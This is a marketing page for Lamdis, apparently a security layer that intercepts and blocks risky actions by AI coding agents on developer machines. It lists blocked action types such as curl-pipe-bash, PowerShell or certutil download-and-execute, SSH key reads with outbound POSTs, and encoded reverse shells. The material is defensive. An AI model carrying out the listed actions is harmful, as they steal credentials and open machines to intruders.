Lamdis is a local runtime security layer for AI coding agents. It intercepts process execution, file writes, and outbound network activity on the developer machine, evaluates them against policy, and stops dangerous actions before they run.
The Gap
AI coding agents — Cursor, Claude Code, Copilot, Windsurf — execute commands, write files, spawn processes, and open network connections directly on the developer's machine.
Existing security tools detect after the fact. EDR catches malware signatures, not an agent that opens security groups to 0.0.0.0/0 through a legitimate Terraform apply. SIEM sees the log hours later. Manual approval prompts don't tell the developer what they're actually approving.
There is currently no enforcement layer between AI agents and the operating system on developer machines. Lamdis is that layer.
What It Does
Lamdis runs on the developer machine and captures agent-initiated process execution, file operations, and outbound network activity before they complete.
Each action is evaluated against policy in real time. Not just pattern matching — Lamdis understands the difference between npm install and curl-pipe-bash, between a normal commit and a config change that opens a backdoor.
Safe actions proceed instantly. Dangerous actions are blocked before they execute — the process never starts, the file never writes, the connection never opens. The agent gets a denial. The developer gets an explanation.
What It Catches
The obvious stuff — remote code execution, credential dumping — gets blocked. But so does the harder stuff that EDR and static rules will never see.
Blocked
PowerShell download-and-execute from remote server
processSSH private key read + outbound POST
exfilTerraform apply opening 0.0.0.0/0 ingress
infraGit push of workflow that curls unknown script
ci/cdcertutil download to temp + immediate execution
processSpawning reverse shell via encoded command
processAllowed
npm install express
packagegit commit -m "fix: update auth handler"
gitpython manage.py migrate
processHTTPS request to api.github.com
networkWrite to src/components/Button.tsx
filedocker build -t app:latest .
processWhen Risky Is Necessary
Sometimes a risky action is the right action. Lamdis doesn't just block — it gives developers a clear explanation and safe ways to proceed.
Approve this specific action. It executes once, the approval is logged, and next time it blocks again.
Grant an exception for a deploy window or a sprint. When it expires, protections re-engage.
The developer sees exactly what the agent is trying to do and why it was flagged. They confirm with context, not a blind click.
Route to a teammate for approval. Two sets of eyes on the risky action, with full audit trail.
Every block, every override, every approval — recorded with who, what, when, and why. Consistent policy enforcement with a real audit trail. Not ad hoc approvals that nobody can reconstruct later.
Where This Goes
Early Access
Lamdis is in private preview with teams that use AI coding agents in production workflows.